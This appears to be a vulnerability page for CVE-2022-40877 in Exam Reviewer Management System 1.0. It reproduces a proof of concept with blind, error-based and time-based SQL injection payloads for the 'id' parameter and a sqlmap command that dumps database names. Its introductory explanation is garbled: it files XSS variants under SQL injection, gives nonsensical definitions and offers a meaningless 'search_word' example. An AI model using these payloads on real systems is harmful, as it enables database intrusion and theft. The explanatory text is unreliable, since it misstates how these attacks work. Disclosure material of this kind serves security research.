CVE-2022-40877 Exam Reviewer Management System 1.0 is vulnerable to SQL Injection via the ‘id’ parameter.

The id parameter is usually used to select a specific record when creating a new post. If an attacker inputs ‘;’ or other malicious characters into this field, it may allow them to access any record.

Exam Reviewer Management System 1.0 is vulnerable to Cross-site scripting (XSS) via the ‘title’ parameter.

The ‘title’ parameter can be used on posts to add a message to the top of the post. The messages can be anything from instructions to users on how to use the site. This can be problematic as it can allow for a malicious user to inject scripts into the site to steal data or perform other attacks.

Exam Reviewer Management System 1.0 is vulnerable to SQL Injection via the ‘search_word’ parameter.

The ‘search_word’ parameter can be used to filter posts. For example, if an attacker inputs ‘&1’ into the ‘search_word’ parameter, then it will return only posts that include ‘&1’ into the ‘search_word’ parameter.

SQL Injection - Introduction

SQL Injection is a type of injection attack that exploits the database underlying an application to inject, read, or modify data. This can be done by inserting SQL code into either the database’s input fields or its application logic.

There are many different types of SQL Injection attacks, but some of the more common ones include:
* Blind SQL Injection: Using some simple syntax elements to construct a valid SQL query that would execute on the target system.
* Stored-XSS: Constructing a payload in such a way that it looks like it is stored in the application and not executed when submitted to it; this is achieved by using whitespace characters, comments, and other non-executing syntax elements.
* Reflected XSS: Using a payload that appears to originate from the application and returns back to the attacker who submitted it when executed.
* Mixed XSS: Combining both blind and reflected XSS methods together.

Exploit

# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
# Date: 2022-02-18
# Exploit Author:  Juli Agarwal(@agarwaljuli)
# Vendor Homepage:
https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html

# Software Link:
https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code

# Version: 1.0
# Tested on: Windows 10/Kali Linux



Description – The ‘id’ parameter in Exam Reviewer Management System web
application is vulnerable to SQL Injection

Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1



POC:-



---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu



Type: error-based

Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (FLOOR)

Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT
COUNT(*),CONCAT(0x71766a7071,(SELECT
(ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA



Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)
AND 'vqGg'='vqGg---



*SQLMAP COMMAND*



*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*

Timeline

Published on: 09/27/2022 23:15:00 UTC
Last modified on: 09/28/2022 23:06:00 UTC

References

• https://www.exploit-db.com/exploits/50725
• https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40877